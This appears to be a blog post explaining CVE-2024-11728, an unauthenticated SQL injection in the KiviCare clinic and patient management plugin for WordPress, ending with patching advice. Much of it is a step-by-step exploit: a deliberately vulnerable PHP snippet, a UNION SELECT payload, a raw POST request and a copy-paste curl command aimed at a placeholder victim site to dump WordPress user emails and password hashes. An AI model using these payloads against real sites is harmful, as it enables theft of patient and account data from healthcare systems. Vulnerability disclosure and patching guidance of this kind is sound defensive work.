The web is an increasingly popular place for healthcare management, but security oversights can put sensitive information at risk. Recently, security researchers and the Wordfence Threat Intelligence team discovered a critical SQL Injection vulnerability in the KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress tracked as CVE-2024-11728.
This post will walk you through what this vulnerability is, how it works, actual exploit details with code snippets, and what you need to do if you’re using KiviCare.
Criticality: High, as attackers can extract protected patient data
The vulnerability exists in the way KiviCare handles input in its AJAX handler called tax_calculated_data. There is no proper escaping or parameterization, so attackers can inject malicious SQL through the visit_type[service_id] parameter.
Why is This Dangerous?
Because KiviCare manages medical records, a successful exploit lets attackers directly query the underlying database. They could extract email addresses, patient names, doctor records, and even change or delete data.
The AJAX Endpoint
KiviCare registers an AJAX action named tax_calculated_data that is exposed both to logged-in and logged-out users. It processes requests with parameters such as:
visit_type[service_id]
But instead of sanitizing these parameters, their values are blindly inserted into an SQL query.
A simplified version of the vulnerable code might look like this
// Vulnerable PHP snippet (simplified)
$service_id = $_POST['visit_type']['service_id'];
$query = "SELECT price FROM {$wpdb->prefix}kivicare_services WHERE id = $service_id";
$result = $wpdb->get_var($query);
Notice: $service_id comes from user input and is not escaped or parameterized.
How the SQL Injection Works
Because there is no validation, an attacker can send something malicious for service_id, for example:
visit_type[service_id]=1 UNION SELECT user_email FROM wp_users WHERE 1=1--
This turns the SQL query into
SELECT price FROM wp_kivicare_services WHERE id = 1 UNION SELECT user_email FROM wp_users WHERE 1=1--
As a result, all user emails in the WordPress site are exposed!
Prepare a POST request (via curl, Burp Suite, or browser DevTools)
POST /wp-admin/admin-ajax.php?action=tax_calculated_data HTTP/1.1
Host: victim-site.com
Content-Type: application/x-www-form-urlencoded
visit_type[service_id]=1 UNION SELECT user_email,2 FROM wp_users--
Note: The UNION SELECT must match the column structure of the query.
Run this in your terminal (replace victim-site.com)
curl -X POST https://victim-site.com/wp-admin/admin-ajax.php \
-d 'action=tax_calculated_data&visit_type[service_id]=1 UNION SELECT user_email,2 FROM wp_users--'
Step 3: Analyze the Response
The response will include data grabbed from the wp_users table—typically WordPress user emails or even password hashes.
Update Immediately:
Upgrade KiviCare to the latest version (check if there's a patch after 3.6.4).
Consider a Web Application Firewall (WAF):
References and Further Reading
- Wordfence Security Advisory: KiviCare SQLi
- CVE Entry in NVD
- Official Plugin Page
Final Thoughts
CVE-2024-11728 is a critical reminder that user input must always be escaped and parameterized—especially in healthcare applications. If you run KiviCare, patch immediately and audit your systems.
If you liked this breakdown, or have specific questions about hardening WordPress plugins, leave a comment or share!
*Stay safe, secure, and always keep plugins up to date!*
Timeline
Published on: 12/06/2024 10:15:05 UTC